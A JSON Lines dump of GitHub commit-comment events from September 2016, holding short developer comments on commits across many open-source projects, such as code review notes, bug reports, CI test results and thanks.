{"id":"4552547417","type":"CommitCommentEvent","actor":{"login":"danielkwinsor"},"repo":{"name":"jaz303/listeners"},"payload":{"comment":{"id":18993665,"position":null,"line":null,"path":null,"commit_id":"b9c194f7b25007a477a6ab12251bf5c17db5287e","created_at":"2016-09-12T23:30:46Z","updated_at":"2016-09-12T23:30:46Z","body":"I confirm the fix works for me, thanks.\r\nSorry I forgot to post this part, but you figured it out\r\n```\r\nListeners {\r\n  _listeners: [ [Function: update], undefined ],\r\n  _onError: [Function: error] }\r\n```"}},"created_at":"2016-09-12T23:30:46Z"}
{"id":"4552552976","type":"CommitCommentEvent","actor":{"login":"aroberge"},"repo":{"name":"aroberge/reeborg"},"payload":{"comment":{"id":18993685,"position":null,"line":null,"path":null,"commit_id":"3079a2a02f852847e14f173e139d19227951c87e","created_at":"2016-09-12T23:32:23Z","updated_at":"2016-09-12T23:32:23Z","body":"This was issue #305 and not #304."}},"created_at":"2016-09-12T23:32:23Z"}
{"id":"4552558125","type":"CommitCommentEvent","actor":{"login":"pwener"},"repo":{"name":"Modesteam/Urutau"},"payload":{"comment":{"id":18993696,"position":null,"line":null,"path":null,"commit_id":"24a47ab3ec64a7ee0db252d418912a36bec45312","created_at":"2016-09-12T23:33:50Z","updated_at":"2016-09-12T23:33:50Z","body":"Thank you @tainarareis "}},"created_at":"2016-09-12T23:33:50Z"}
{"id":"4552561807","type":"CommitCommentEvent","actor":{"login":"lazyjapaneseegg"},"repo":{"name":"ItsDeidara/The-Binding-of-Isaac-Mod-Conversion-Kit"},"payload":{"comment":{"id":18993709,"position":54,"line":54,"path":"WindowsFormsApplication1/Form1.cs","commit_id":"f19e615882cfe159a2fa9fc683fd211a0c5f639f","created_at":"2016-09-12T23:34:53Z","updated_at":"2016-09-12T23:34:53Z","body":"this may fail, check for file existence before loading it"}},"created_at":"2016-09-12T23:34:53Z"}
{"id":"4552564425","type":"CommitCommentEvent","actor":{"login":"lazyjapaneseegg"},"repo":{"name":"ItsDeidara/The-Binding-of-Isaac-Mod-Conversion-Kit"},"payload":{"comment":{"id":18993718,"position":42,"line":42,"path":"WindowsFormsApplication1/Form1.cs","commit_id":"f19e615882cfe159a2fa9fc683fd211a0c5f639f","created_at":"2016-09-12T23:35:36Z","updated_at":"2016-09-12T23:35:36Z","body":"you can safely remove all the comments as they're now in git history :)"}},"created_at":"2016-09-12T23:35:36Z"}
{"id":"4552565845","type":"CommitCommentEvent","actor":{"login":"pmidford"},"repo":{"name":"arachnolingua/arachcurator"},"payload":{"comment":{"id":18993723,"position":null,"line":null,"path":null,"commit_id":"7b6ec555d9d32c02b50404b8378b3e15a6e2a85b","created_at":"2016-09-12T23:36:02Z","updated_at":"2016-09-12T23:36:02Z","body":"Of course that should be beautiful soup."}},"created_at":"2016-09-12T23:36:02Z"}
{"id":"4552568085","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18993732,"position":null,"line":null,"path":null,"commit_id":"856c19805e166e2dbf7c47a29179058aa40eae85","created_at":"2016-09-12T23:36:40Z","updated_at":"2016-09-12T23:36:40Z","body":"That is really too bad."}},"created_at":"2016-09-12T23:36:40Z"}
{"id":"4552569969","type":"CommitCommentEvent","actor":{"login":"ChronoMonochrome"},"repo":{"name":"ChronoMonochrome/Chrono_Kernel-1"},"payload":{"comment":{"id":18993739,"position":5,"line":715,"path":"arch/arm/configs/codina_defconfig","commit_id":"f561c5d71dd58e5bc273b0b5fd04a3d92a81b4f2","created_at":"2016-09-12T23:37:11Z","updated_at":"2016-09-12T23:37:11Z","body":"You need either compile NETFILTER_XT_TARGET_HL as module or built-in part of kernel. You might want to apply the whole commit only if you have modules that depends on symbols in security - so far relocation-related errors  can be avoided only if module is built in ARM mode, and all of symbols it depends upon, are also compiled in ARM."}},"created_at":"2016-09-12T23:37:11Z"}
{"id":"4552570106","type":"CommitCommentEvent","actor":{"login":"philipbelesky"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18993740,"position":null,"line":null,"path":null,"commit_id":"8b6874f37749fa746b1ae46c63dba8aaaf31bf42","created_at":"2016-09-12T23:37:14Z","updated_at":"2016-09-12T23:37:14Z","body":"It's a tradeoff, but I think relatively worthwhile. The bugs only affecting public pages are typically simpler and occur less often. However when they do occur they also have greater visibility (say if feedback submission crashes) in which we probably don't want tens of bug reports. "}},"created_at":"2016-09-12T23:37:14Z"}
{"id":"4552574155","type":"CommitCommentEvent","actor":{"login":"lazyjapaneseegg"},"repo":{"name":"ItsDeidara/The-Binding-of-Isaac-Mod-Conversion-Kit"},"payload":{"comment":{"id":18993751,"position":24,"line":24,"path":"WindowsFormsApplication1/Form1.cs","commit_id":"f19e615882cfe159a2fa9fc683fd211a0c5f639f","created_at":"2016-09-12T23:38:27Z","updated_at":"2016-09-12T23:38:27Z","body":"once you've done you can remove methods that are not used (you need to remove where the event is added in the  with += in the designer file or you can just delete it from the visual editor of visual studio)"}},"created_at":"2016-09-12T23:38:27Z"}
{"id":"4552577699","type":"CommitCommentEvent","actor":{"login":"nirvdrum"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18993762,"position":24,"line":587,"path":"truffle/src/main/java/org/jruby/truffle/extra/TrufflePosixNodes.java","commit_id":"553bfc90cae578c9c0bb3bb903c0d5fa77b05204","created_at":"2016-09-12T23:39:30Z","updated_at":"2016-09-12T23:39:30Z","body":"This looks funny. Why bother with the POSIX call if it must be the same as what the JRuby runtime is reporting?"}},"created_at":"2016-09-12T23:39:30Z"}
{"id":"4552588896","type":"CommitCommentEvent","actor":{"login":"QuarianCommando"},"repo":{"name":"QuarianCommando/HippieStation13"},"payload":{"comment":{"id":18993803,"position":null,"line":null,"path":null,"commit_id":"cedff527f24967f277cf68f9fed634242b20a18f","created_at":"2016-09-12T23:42:48Z","updated_at":"2016-09-12T23:42:48Z","body":"Added a parent to weaponry.dm allow various snowflakey vars to be added to melee weapons.\r\n\r\nAlso added a few of said snowflakey vars, allowing the null rod to be renamed with a pen, and reskinned once. The changes are entirely cosmetic, and the null rod retains all of it's uses."}},"created_at":"2016-09-12T23:42:48Z"}
{"id":"4552597060","type":"CommitCommentEvent","actor":{"login":"wansco"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":18993824,"position":null,"line":null,"path":null,"commit_id":"4f3a501063cf6023c1cc93007e786be54cf763b7","created_at":"2016-09-12T23:45:19Z","updated_at":"2016-09-12T23:45:19Z","body":"Good catch. owasp test result has \"requiredTestErrors\" and \"optionalTestErrors\" in addition to just the \"errors\" which are displayed as well as a count of optionalTestsPassed.\r\n\r\nWe could split them up to display the error text as following:\r\nrequiredTestErrors --- this is pretty much just the length test, I believe\r\n[if optionalTestErrors]\r\nAt least [minOptionalTestsToPass - optionalTestsPassed] of the following \r\noptionalTestErrors\r\n\r\nI'll work on a real code example for that.\r\n\r\nThe progress bar item count should probably be 1+minOptionalTestsToPass and dynamically generated. I'll work through that as well.\r\n\r\n\r\nI think the popover message is fine (in password-validator.client.service.js), but could be tweaked from:\r\n`      var popoverMsg = 'Please enter a passphrase or password with ' + owaspPasswordStrengthTest.configs.minLength + ' or more characters, numbers, lowercase, uppercase, and special characters.';`\r\nto:\r\n`      var popoverMsg = 'Please enter a passphrase or password with ' + owaspPasswordStrengthTest.configs.minLength + ' or more characters.\\nAnd at least ' + owaspPasswordStrengthTest.configs.minOptionalTestsToPass + ' of the following: numbers, lowercase, uppercase, and special characters.';`\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-12T23:45:19Z"}
{"id":"4552600142","type":"CommitCommentEvent","actor":{"login":"gmpreussner"},"repo":{"name":"videolan/vlc"},"payload":{"comment":{"id":18993831,"position":null,"line":null,"path":null,"commit_id":"c220ddc927d1a97f72a0c5bf86de56301e3483ad","created_at":"2016-09-12T23:46:16Z","updated_at":"2016-09-12T23:46:16Z","body":"@jbkempf  This change breaks consumers of libvlc if they need to load libraries after initializing libvlc. The problem is that SetDefaultDllDirectories is a global application wide switch and as such will enforce System32 as the ONLY search directory for all subsequent LoadLibrary and LoadLibraryEx calls in the application. \r\n\r\nAccording to the documentation, it is impossible to revert this setting once it is set. The only way around this is to use LoadLibraryEx in combination with AddDllDirectory and the correct search flags. However, this means that existing code in the host application will have to be written, which is often not possible.\r\n\r\nI suggest that you do not modify the default search path in the library itself. If you wish to enforce certain restrictions then you should do so in the VLC application, otherwise libvlc breaks the host application."}},"created_at":"2016-09-12T23:46:16Z"}
{"id":"4552600754","type":"CommitCommentEvent","actor":{"login":"PostalMuttonchops"},"repo":{"name":"PostalMuttonchops/dotfiles"},"payload":{"comment":{"id":18993835,"position":null,"line":null,"path":null,"commit_id":"fd93a56ed4dbb869cf8cd1932bd3b69e2f374837","created_at":"2016-09-12T23:46:27Z","updated_at":"2016-09-12T23:46:27Z","body":"Ooh, that was a bad idea."}},"created_at":"2016-09-12T23:46:27Z"}
{"id":"4552601532","type":"CommitCommentEvent","actor":{"login":"zoroarkcity"},"repo":{"name":"ColinAV516/ShadowWorld"},"payload":{"comment":{"id":18993840,"position":null,"line":null,"path":null,"commit_id":"f445672696a7df25773ac1fb409bf114207625ff","created_at":"2016-09-12T23:46:41Z","updated_at":"2016-09-12T23:46:41Z","body":"GG"}},"created_at":"2016-09-12T23:46:41Z"}
{"id":"4552602673","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18993844,"position":null,"line":null,"path":null,"commit_id":"5d3c27d6c4f3bf7bb452ff005934cb09f6d76700","created_at":"2016-09-12T23:46:59Z","updated_at":"2016-09-12T23:46:59Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1189 of 1189 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d3c27d6c4f3bf7bb452ff005934cb09f6d76700-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d3c27d6c4f3bf7bb452ff005934cb09f6d76700-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d3c27d6c4f3bf7bb452ff005934cb09f6d76700-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.98%25-green.svg)</a>\n"}},"created_at":"2016-09-12T23:46:59Z"}
{"id":"4552617691","type":"CommitCommentEvent","actor":{"login":"guilhermeferreira"},"repo":{"name":"JuergenKosel/paho.mqtt.c"},"payload":{"comment":{"id":18993885,"position":null,"line":null,"path":null,"commit_id":"75906b747094ccf72b3e42dbe856a16f59d36f16","created_at":"2016-09-12T23:51:14Z","updated_at":"2016-09-12T23:51:14Z","body":"I wonder if the pull request #175 may interfere with this change."}},"created_at":"2016-09-12T23:51:14Z"}
{"id":"4552624021","type":"CommitCommentEvent","actor":{"login":"caall99"},"repo":{"name":"jetty840/Sailfish-MightyBoardFirmware"},"payload":{"comment":{"id":18993896,"position":null,"line":null,"path":null,"commit_id":"7040951d3f217b0964bf3199a04568a0a7386aab","created_at":"2016-09-12T23:53:12Z","updated_at":"2016-09-12T23:53:12Z","body":"I was presented with the following error when trying to flash the AVR: \r\n\r\nTimestamp:\t2016-09-12 19:51:41.811\r\nSeverity:\t\tERROR\r\nComponentId:\t20100\r\nStatusCode:\t1\r\nModuleName:\tTCF command: Modules:writeToMemory failed.\r\n\r\nAn error occured while executing command with ID 0x13. Read from USB device endpoint 130 failed: Invalid WinDriver handle (0xffffffff)."}},"created_at":"2016-09-12T23:53:12Z"}
{"id":"4552624688","type":"CommitCommentEvent","actor":{"login":"blakedy"},"repo":{"name":"shinjonathan/jesque"},"payload":{"comment":{"id":18993897,"position":14,"line":268,"path":"src/main/java/net/greghaines/jesque/client/AbstractClient.java","commit_id":"fb141c9499a8b2226dd79c6cc6ba5ad0ce75fdc7","created_at":"2016-09-12T23:53:24Z","updated_at":"2016-09-12T23:53:24Z","body":"there has to be a better method to go from milliseconds type long to seconds"}},"created_at":"2016-09-12T23:53:24Z"}
{"id":"4552628706","type":"CommitCommentEvent","actor":{"login":"Ownasaurus"},"repo":{"name":"Ownasaurus/TASLink"},"payload":{"comment":{"id":18993904,"position":null,"line":null,"path":null,"commit_id":"aa45994f3e6b02c381ded473660621406509ae03","created_at":"2016-09-12T23:54:37Z","updated_at":"2016-09-12T23:54:37Z","body":"forgot to add: fixed bug with multitap"}},"created_at":"2016-09-12T23:54:37Z"}
{"id":"4552632385","type":"CommitCommentEvent","actor":{"login":"sergiobenrocha2"},"repo":{"name":"libretro/gw-libretro"},"payload":{"comment":{"id":18993919,"position":null,"line":null,"path":null,"commit_id":"284b15c58260403343a4f4e773b613d6db8da8a6","created_at":"2016-09-12T23:55:46Z","updated_at":"2016-09-12T23:55:46Z","body":"Why we are duplicating info files in the core repos ?"}},"created_at":"2016-09-12T23:55:46Z"}
{"id":"4552633838","type":"CommitCommentEvent","actor":{"login":"bvaughn"},"repo":{"name":"JedWatson/react-select"},"payload":{"comment":{"id":18993922,"position":null,"line":null,"path":null,"commit_id":"a863d15092c97fc2db9f94f28a147e20a9d03ed8","created_at":"2016-09-12T23:56:11Z","updated_at":"2016-09-12T23:56:11Z","body":"This is an ongoing work. Jed accidentally merged my initial PR too soon. See PR #1210 for the (perhaps) final solution. If you'd like to test that branch- feel free to let me know what you find! I'd love to get more people testing it than just me. 😄 "}},"created_at":"2016-09-12T23:56:11Z"}
{"id":"4552634262","type":"CommitCommentEvent","actor":{"login":"behlendorf"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18993923,"position":25,"line":86,"path":"README.md","commit_id":"42ce0e0fb17a25002b6bd2dee07a1ab1c4311040","created_at":"2016-09-12T23:56:18Z","updated_at":"2016-09-12T23:56:18Z","body":"s/for a change/tests for a change/"}},"created_at":"2016-09-12T23:56:18Z"}
{"id":"4552635496","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18993924,"position":null,"line":null,"path":null,"commit_id":"fff2c91b9641dd378d853145534f47a3f1a426f1","created_at":"2016-09-12T23:56:42Z","updated_at":"2016-09-12T23:56:42Z","body":"The TLS-ChaCha tests were added to confirm the interop problem between ChaCha and TLS-ChaCha. They are disabled by default.\r\n\r\nThe TLS-ChaCha test vectors can be run with:\r\n\r\n```\r\n./cryptest.exe tv tls_chacha\r\n```"}},"created_at":"2016-09-12T23:56:42Z"}
{"id":"4552640704","type":"CommitCommentEvent","actor":{"login":"behlendorf"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18993936,"position":19,"line":59,"path":"README.md","commit_id":"42ce0e0fb17a25002b6bd2dee07a1ab1c4311040","created_at":"2016-09-12T23:58:13Z","updated_at":"2016-09-12T23:58:13Z","body":"There are now three types of builders."}},"created_at":"2016-09-12T23:58:13Z"}
{"id":"4552641024","type":"CommitCommentEvent","actor":{"login":"idgrepthat"},"repo":{"name":"AuroraWright/Luma3DS"},"payload":{"comment":{"id":18993938,"position":null,"line":null,"path":null,"commit_id":"50e5c29b1c87e2c2d05002228852a903d0946a37","created_at":"2016-09-12T23:58:18Z","updated_at":"2016-09-12T23:58:18Z","body":"Like"}},"created_at":"2016-09-12T23:58:18Z"}
{"id":"4552642217","type":"CommitCommentEvent","actor":{"login":"EwyBoy"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":18993941,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-12T23:58:42Z","updated_at":"2016-09-12T23:58:42Z","body":"Lex <3"}},"created_at":"2016-09-12T23:58:42Z"}
{"id":"4547099765","type":"CommitCommentEvent","actor":{"login":"RamonRR93"},"repo":{"name":"RamonRR93/datasciencecoursera"},"payload":{"comment":{"id":18979430,"position":null,"line":null,"path":null,"commit_id":"e72bea09fe89f824de8094af162aa976407d80aa","created_at":"2016-09-12T03:00:02Z","updated_at":"2016-09-12T03:00:02Z","body":"C"}},"created_at":"2016-09-12T03:00:02Z"}
{"id":"4547100696","type":"CommitCommentEvent","actor":{"login":"tassoevan"},"repo":{"name":"webiwg/webiwg-issues"},"payload":{"comment":{"id":18979431,"position":202,"line":209,"path":"traducao.md","commit_id":"d1070d6ab261b0b925621e76e5e5518b3dc314c1","created_at":"2016-09-12T03:00:24Z","updated_at":"2016-09-12T03:00:24Z","body":"Eu posso tentar reescrever para deixar clara a diferença entre mídia embutida no texto e mídia anexa (de uma forma mais simples, claro)."}},"created_at":"2016-09-12T03:00:24Z"}
{"id":"4547101794","type":"CommitCommentEvent","actor":{"login":"andrewphorn"},"repo":{"name":"UnknownShadow200/ClassicalSharp"},"payload":{"comment":{"id":18979432,"position":null,"line":null,"path":null,"commit_id":"da8ebc61b12a4a9e5196afb0c6881296b2f85ded","created_at":"2016-09-12T03:00:51Z","updated_at":"2016-09-12T03:00:51Z","body":"2026"}},"created_at":"2016-09-12T03:00:51Z"}
{"id":"4547102160","type":"CommitCommentEvent","actor":{"login":"AlexCSilva"},"repo":{"name":"Zyk6870/OpenJK"},"payload":{"comment":{"id":18979433,"position":null,"line":null,"path":null,"commit_id":"fce5358b60a4e0c05645b8c657efa4300cb10649","created_at":"2016-09-12T03:01:01Z","updated_at":"2016-09-12T03:01:01Z","body":"Lightning Shield ey"}},"created_at":"2016-09-12T03:01:01Z"}
{"id":"4547102456","type":"CommitCommentEvent","actor":{"login":"brandonkreitler"},"repo":{"name":"brandonkreitler/brandonkreitler.github.io"},"payload":{"comment":{"id":18979434,"position":null,"line":null,"path":null,"commit_id":"2007a28fc4eec78b2fd12d67fd3e69b4a6184528","created_at":"2016-09-12T03:01:10Z","updated_at":"2016-09-12T03:01:10Z","body":"A conversation of January 1950, reported by Staël’s friend Pierre Lecuire, does something to attenuate, or at least to account for, the seemingly paradoxical character of Staël’s commitment to abstraction. ‘Look,’ he said, pointing to a glue-pot and an ashtray, ‘here are objects, and this is just what I don’t represent.’ Then, picking up a pencil, he made it pass backwards and forwards from the glue-pot to the ashtray. ‘Now, look, that’s painting. L’entre-deux, what lies between the two. Braque paints what is around the objects, then he represents the objects. As for myself, objects, they don’t interest me any longer. I no longer paint them.’ Pressed as to what was left of the object in his painting, Staël said: ‘Rapport. Rapport. Rapport.’ "}},"created_at":"2016-09-12T03:01:10Z"}
{"id":"4547107688","type":"CommitCommentEvent","actor":{"login":"tassoevan"},"repo":{"name":"webiwg/webiwg-issues"},"payload":{"comment":{"id":18979442,"position":null,"line":null,"path":null,"commit_id":"d8efee004a8d6c9a971787afd48f4d54ff1d7277","created_at":"2016-09-12T03:03:35Z","updated_at":"2016-09-12T03:03:35Z","body":"Esqueci completamente que a referência simples ao issue na mensagem não o fecha automaticamente. Vícios que adquiri de outros serviços de versionamento..."}},"created_at":"2016-09-12T03:03:35Z"}
{"id":"4547111480","type":"CommitCommentEvent","actor":{"login":"BinWone"},"repo":{"name":"BinWone/binwone.github.io"},"payload":{"comment":{"id":18979448,"position":null,"line":null,"path":null,"commit_id":"67986f25256ff36a83b60083e0958249b4d14788","created_at":"2016-09-12T03:05:31Z","updated_at":"2016-09-12T03:05:31Z","body":"update"}},"created_at":"2016-09-12T03:05:31Z"}
{"id":"4547112696","type":"CommitCommentEvent","actor":{"login":"BinWone"},"repo":{"name":"BinWone/binwone.github.io"},"payload":{"comment":{"id":18979451,"position":null,"line":null,"path":null,"commit_id":"f7fc682950656aad8f4a0e9233e3750d0f5d56c5","created_at":"2016-09-12T03:06:05Z","updated_at":"2016-09-12T03:06:05Z","body":"update"}},"created_at":"2016-09-12T03:06:05Z"}
{"id":"4547117172","type":"CommitCommentEvent","actor":{"login":"microdsy"},"repo":{"name":"microdsy/OAuth"},"payload":{"comment":{"id":18979459,"position":null,"line":null,"path":null,"commit_id":"327720dfa65fe7384bd9fe6d02ad8aff476369db","created_at":"2016-09-12T03:08:06Z","updated_at":"2016-09-12T03:08:06Z","body":"这是第一个版本的OAuth。在这个版本中，初始化config的方式分为配置文件初始化和类初始化两种方式，但是利用配置文件的方式冗余，会加重用户负担，所以考虑在接下来的版本中去掉该方式"}},"created_at":"2016-09-12T03:08:06Z"}
{"id":"4547126660","type":"CommitCommentEvent","actor":{"login":"tuttinator"},"repo":{"name":"nzherald/ember-cli-mapbox-gl"},"payload":{"comment":{"id":18979474,"position":8,"line":23,"path":"addon/services/mapbox-gl.js","commit_id":"1f49b8de6e93ec2f22c312476f9d09823405b46a","created_at":"2016-09-12T03:12:32Z","updated_at":"2016-09-12T03:12:32Z","body":"It turns out that a `null` bearing is the cause of the 'Failed to invert matrix' error, rather than the format or order of latitude and longitude coordinates: https://github.com/mapbox/mapbox-gl-js/issues/1189\r\n\r\nA better approach would be to not include keys for null values."}},"created_at":"2016-09-12T03:12:32Z"}
{"id":"4547135964","type":"CommitCommentEvent","actor":{"login":"Jr0788"},"repo":{"name":"Jr0788/projeto_aec"},"payload":{"comment":{"id":18979496,"position":null,"line":null,"path":null,"commit_id":"35a77e43eeb2366253587ccc4821827d349831b3","created_at":"2016-09-12T03:17:00Z","updated_at":"2016-09-12T03:17:00Z","body":"Atividade 01"}},"created_at":"2016-09-12T03:17:00Z"}
{"id":"4547140904","type":"CommitCommentEvent","actor":{"login":"ESC12014"},"repo":{"name":"ESC12014/hello-world"},"payload":{"comment":{"id":18979510,"position":null,"line":null,"path":null,"commit_id":"c3ba6698de2125020491c1881c771c79bedb5751","created_at":"2016-09-12T03:19:18Z","updated_at":"2016-09-12T03:19:18Z","body":"Change done to test how edits work"}},"created_at":"2016-09-12T03:19:18Z"}
{"id":"4547142962","type":"CommitCommentEvent","actor":{"login":"nihgwu"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18979513,"position":null,"line":null,"path":null,"commit_id":"c18d1dfd7d46c50320bfea83a7d48e829b579e93","created_at":"2016-09-12T03:20:13Z","updated_at":"2016-09-12T03:20:13Z","body":"@grabbou the compare link in the release note is wrong\r\nhttps://github.com/facebook/react-native/compare/0.31-stable...0.32-stable\r\nshould be\r\nhttps://github.com/facebook/react-native/compare/0.32-stable...0.33-stable"}},"created_at":"2016-09-12T03:20:13Z"}
{"id":"4547152180","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18979546,"position":null,"line":null,"path":null,"commit_id":"d83a7e08a9ab15c2faae179f43430e0f5a4db4ca","created_at":"2016-09-12T03:24:29Z","updated_at":"2016-09-12T03:24:29Z","body":"Also see [Issue 226: SunCC 12.2-12.4 failed compile with C++{03|11} for gcm.cpp](https://github.com/weidai11/cryptopp/issues/226)."}},"created_at":"2016-09-12T03:24:29Z"}
{"id":"4547152863","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18979548,"position":null,"line":null,"path":null,"commit_id":"737f5b0b72dd5527111f7fc4fd1ec373b5548106","created_at":"2016-09-12T03:24:46Z","updated_at":"2016-09-12T03:24:46Z","body":"Also see [Issue 226: SunCC 12.2-12.4 failed compile with C++{03|11} for gcm.cpp](https://github.com/weidai11/cryptopp/issues/226)."}},"created_at":"2016-09-12T03:24:46Z"}
{"id":"4547152990","type":"CommitCommentEvent","actor":{"login":"zaxlct"},"repo":{"name":"2remote/yaopai-mobile"},"payload":{"comment":{"id":18979549,"position":37,"line":33,"path":"app/components/WorkPage/PriceTag.js","commit_id":"c589624bb48ead90dddf23f92a3fdd09b0002365","created_at":"2016-09-12T03:24:50Z","updated_at":"2016-09-12T03:24:50Z","body":"@liubiantao 箭头函数如果只返回一个结果没有其他的语句就可以省略 return"}},"created_at":"2016-09-12T03:24:50Z"}
{"id":"4547154701","type":"CommitCommentEvent","actor":{"login":"theoryshaw"},"repo":{"name":"OpeningDesign/FreeMVD_WorkFlow"},"payload":{"comment":{"id":18979556,"position":5,"line":41,"path":"Specifications test files/Wall/from Revit/Testing/Wall_4.ifc","commit_id":"ba335ee06ebbb4c0b7a5d90c83cc8aa0f8fb8f99","created_at":"2016-09-12T03:25:37Z","updated_at":"2016-09-12T03:25:37Z","body":"@yorikvanhavre both IFCWALL and IFCWALLSTANDARDCASE work."}},"created_at":"2016-09-12T03:25:37Z"}
{"id":"4547159393","type":"CommitCommentEvent","actor":{"login":"theoryshaw"},"repo":{"name":"OpeningDesign/FreeMVD_WorkFlow"},"payload":{"comment":{"id":18979564,"position":15,"line":76,"path":"Specifications test files/Wall/from Revit/Testing/Wall_4.ifc","commit_id":"ba335ee06ebbb4c0b7a5d90c83cc8aa0f8fb8f99","created_at":"2016-09-12T03:27:47Z","updated_at":"2016-09-12T03:27:47Z","body":"@yorikvanhavre You can delete IFCRELDEFINESBYTYPE & IFCWALLTYPE and it still works.  However, I have a feeling 'types' are going to be relatively important."}},"created_at":"2016-09-12T03:27:47Z"}
{"id":"4547161897","type":"CommitCommentEvent","actor":{"login":"taznux"},"repo":{"name":"taznux/lung-image-analysis"},"payload":{"comment":{"id":18979568,"position":null,"line":null,"path":null,"commit_id":"7b6cdf6c33417b072cb64d462c542bab79a444fd","created_at":"2016-09-12T03:28:56Z","updated_at":"2016-09-12T03:28:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;1K7TsTGC&#x2F;2-test\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> test</a>"}},"created_at":"2016-09-12T03:28:56Z"}
{"id":"4547162657","type":"CommitCommentEvent","actor":{"login":"graviernoumea"},"repo":{"name":"graviernoumea/essai-hello"},"payload":{"comment":{"id":18979570,"position":null,"line":null,"path":null,"commit_id":"d502b72c94cab86eb710c2318ae14546bf1d78f2","created_at":"2016-09-12T03:29:18Z","updated_at":"2016-09-12T03:29:18Z","body":"essai cgt"}},"created_at":"2016-09-12T03:29:18Z"}
{"id":"4547163235","type":"CommitCommentEvent","actor":{"login":"theoryshaw"},"repo":{"name":"OpeningDesign/FreeMVD_WorkFlow"},"payload":{"comment":{"id":18979571,"position":20,"line":81,"path":"Specifications test files/Wall/from Revit/Testing/Wall_4.ifc","commit_id":"ba335ee06ebbb4c0b7a5d90c83cc8aa0f8fb8f99","created_at":"2016-09-12T03:29:33Z","updated_at":"2016-09-12T03:29:33Z","body":" @yorikvanhavre When I deleted, IFCRELASSOCIATESMATERIAL it went back to importing as an in-place family."}},"created_at":"2016-09-12T03:29:33Z"}
{"id":"4547163928","type":"CommitCommentEvent","actor":{"login":"enigmaquip"},"repo":{"name":"mrkite/TerraFirma"},"payload":{"comment":{"id":18979572,"position":null,"line":null,"path":null,"commit_id":"e067f580d933701d866c0db7bcdeb7d8eb6a8ad6","created_at":"2016-09-12T03:29:53Z","updated_at":"2016-09-12T03:29:53Z","body":"Best commit title ever"}},"created_at":"2016-09-12T03:29:53Z"}
{"id":"4547174338","type":"CommitCommentEvent","actor":{"login":"SchlauFuchs"},"repo":{"name":"AbleTech/easy-api"},"payload":{"comment":{"id":18979592,"position":null,"line":null,"path":null,"commit_id":"5a2d1d07763a8d5232a488c0521e425a3cb0187e","created_at":"2016-09-12T03:34:47Z","updated_at":"2016-09-12T03:34:47Z","body":"Why is Result no longer inheriting OpenStruct?"}},"created_at":"2016-09-12T03:34:47Z"}
{"id":"4547177282","type":"CommitCommentEvent","actor":{"login":"bFraley"},"repo":{"name":"Upper-Polo/todo_list"},"payload":{"comment":{"id":18979598,"position":null,"line":null,"path":null,"commit_id":"0089402de002501f9a7c6437ca33b942444cee51","created_at":"2016-09-12T03:36:08Z","updated_at":"2016-09-12T03:36:08Z","body":"looks good, way to go!"}},"created_at":"2016-09-12T03:36:08Z"}
{"id":"4547192177","type":"CommitCommentEvent","actor":{"login":"wpoosanguansit"},"repo":{"name":"tmuxinator/tmuxinator"},"payload":{"comment":{"id":18979616,"position":null,"line":null,"path":null,"commit_id":"28e5ba658d2868ff0caa539893ae2189a4326fc4","created_at":"2016-09-12T03:43:14Z","updated_at":"2016-09-12T03:43:14Z","body":"I am sorry that this is on a back burner now as we do not have any need to do screensharing at the moment.  I will definitely like to try this again.  Please let me know if this is pushed to the master.  That way it is easier for me to test it.  Thanks for your help."}},"created_at":"2016-09-12T03:43:14Z"}
